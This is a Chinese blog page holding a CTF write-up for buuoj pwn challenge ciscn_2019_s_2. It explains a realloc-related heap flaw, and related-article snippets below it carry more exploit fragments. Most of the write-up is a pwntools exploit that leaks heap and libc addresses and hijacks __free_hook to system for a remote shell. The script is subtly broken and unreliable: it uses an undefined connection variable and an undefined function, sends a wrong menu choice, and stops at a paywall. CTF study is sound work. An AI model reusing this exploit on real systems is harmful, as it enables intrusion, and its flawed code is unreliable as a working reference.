buuoj Pwn writeup 256-260

最新推荐文章于 2025-08-17 03:25:58 发布
原创 最新推荐文章于 2025-08-17 03:25:58 发布 · 385 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

博客内容涉及多个CTF挑战的解决方案,涵盖了堆管理漏洞利用、libc地址泄露、free_hook劫持等技术,包括对realloc、free、edit操作的利用,以及通过编辑字符串进行内存控制和got表劫持,最终实现远程命令执行。

256 ciscn_2019_s_2

在这里插入图片描述
add
在这里插入图片描述申请一个0x10的chunk,分别放着地址,大小,flag。

edit
在这里插入图片描述有个realloc,一会小心。

show
在这里插入图片描述
这个show就平平无奇。

delete
在这里插入图片描述
free没啥问题。但是他没有管我们刚刚说的结构体里面的flag。

这就导致什么,我们再free了chunk之后,ptr指针没了,但是我们可以edit传入空指针,走一次realloc。

空指针的realloc会发生什么,当我们的size是的时候,realloc会将他释放掉,清理指针的

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

elf = ELF("./256")

r = remote('node4.buuoj.cn',29001)
libc = ELF('./64/libc-2.27.so')

def add(size,content):
		r.sendlineafter('choice:',"1")
		r.sendlineafter('size?>',str(size))
		r.sendafter('content:',content)
def edit(idx,content):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))
		r.sendafter('content:',content)
def show(idx):
		r.sendlineafter('choice:',"3")
		r.sendlineafter('Index:',str(idx))
def delete(idx):
		r.sendlineafter('choice:',str(idx))
		r.sendlineafter('Index:',str(idx))
def edit2(idx):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))

add(0,'')
edit2(0)
delete(0)
add(0x10,p64(0))	#0
add(0x20,'aaa')		#1
show(0)
r.recvuntil('Content: ')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x2a0

add(0x500,'aaa')	#2
add(0,'')			#3
delete(2)
edit(0,p64(heap_base+0x2f0))	
show(1)
r.recvuntil('Content: ')
libc.address = u64(p.recv(6).ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
add(0x500,'/bin/sh\x00')	#2
fuck(3)
delete(3)
add(0x10,p64(libc.sym['__free_hook']))	#3
add(0x10,p64(libc.sym['system']))
delete
最低0.47元/天 解锁文章
二进制安全基础之pwn利器pwntools
kelxLZ的博客
06-24 1615
Author:ZERO-A-ONE Date:2021-06-24 一、深入理解pwntools的使用 1.1 pwntools常用模块 asm:汇编与反汇编 dynelf:远程符号泄露 elf:elf文件操作 gdb:启动gdb调试 shellcraft:shellcode的生成器 cyclic pattern:偏移字符计算 process/remote:读写接口 1.2 汇编与反汇编 将汇编指令转为机器码 >>> asm('nop') '\x90' 将机器码转为汇编指令 &g.
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
others_easyheap
doudoudedi
02-04 489
思路 堆溢出构造堆块重叠打free_hook为system exp: from pwn import * #p=process('./easyheap') elf=ELF('./easyheap') libc=elf.libc p=remote('node3.buuoj.cn',29973) def add(size,content): p.sendlineafter(':','1') p.s...
2017湖湘杯 pwn300
weixin_45966329的博客
02-28 213
2017湖湘杯 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcode执行即可 from pwn import * context(os='linux',arch='x86',log_level='debug') io=remote("node3.buuoj.cn",29028) #io=process("pwn300") elf=ELF('pwn300') def add
2017湖湘杯pwn300的wp
一个码农的笔记
12-03 1175
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.youkuaiyun.com/download/niexinming/10143408 把pwn300直接拖入ida中: main函数: add函数: 这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有
湖湘杯hxb_pwn
Trick的博客
11-08 250
湖湘杯hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 367
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 589
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
2017湖湘杯pwn100的wp
一个码农的笔记
11-30 2949
湖湘杯的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.youkuaiyun.com/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
CTFshow-pwn入门-pwn100 WP
最新发布
Claire_cat的学习记录
08-17 2189
在栈上的第二个位置,对于 printf 来说,rdi 是函数本身,第一个参数是 rsi,然后是 rdx、rcx、r8、r9,栈上第一个,栈上第二个的。原来正常返回的 main 函数某个地址和我们写入的后门地址都是在 elf 基址上计算的,高位相同。这里还在找后面地址在栈上的位置,所以这里的 1 是随便填的,hn 是写入两字节,对应地址后四位。的第一个参数,在调用 printf 时,寄存器会存 printf 的参数,会暂时把在。个,加上寄存器上的 5 个和栈上的第 0 个,是格式化字符串的第 17 个参数,
qwb2019_one(strchr的误用)
seaaseesa的博客
06-11 681
qwb2019_one(strchr的误用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,test功能里abs函数存在溢出,由此可以造成下标越界,进而可以泄露程序的地址。 在edit功能里,strchr可以返回字符串结尾的’\0’的位置,因此可以造成off bu one,我们每一次进行off by one将结尾的\0改掉,这样,我们就可以一步一步的逼近下一个chunk的size处,进而可以修改size 我们可以通过控制size,然后伪造chunk,进行unlink操作,然后
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1148
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
XDCTF PWN300&400 Writeup
这里没人
05-14 826
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
(BUUCTF)pwnable_bf
xy1458214551的博客
01-12 486
BUUCTF的pwnable_bf题解
攻防世界 - pwn100 - WriteUp
哒君的博客
06-11 4311
pwn100 文件链接 -> Github checksec 寻找漏洞 sub_40063D 函数中获取输入存放到 v1 ,存在栈溢出漏洞 攻击思路 该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc ,写入 /bin/sh 的操作 寄存器 rdi 中存放的是写入的地址,rsi 是写入的字节数,所以可以通过 po...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值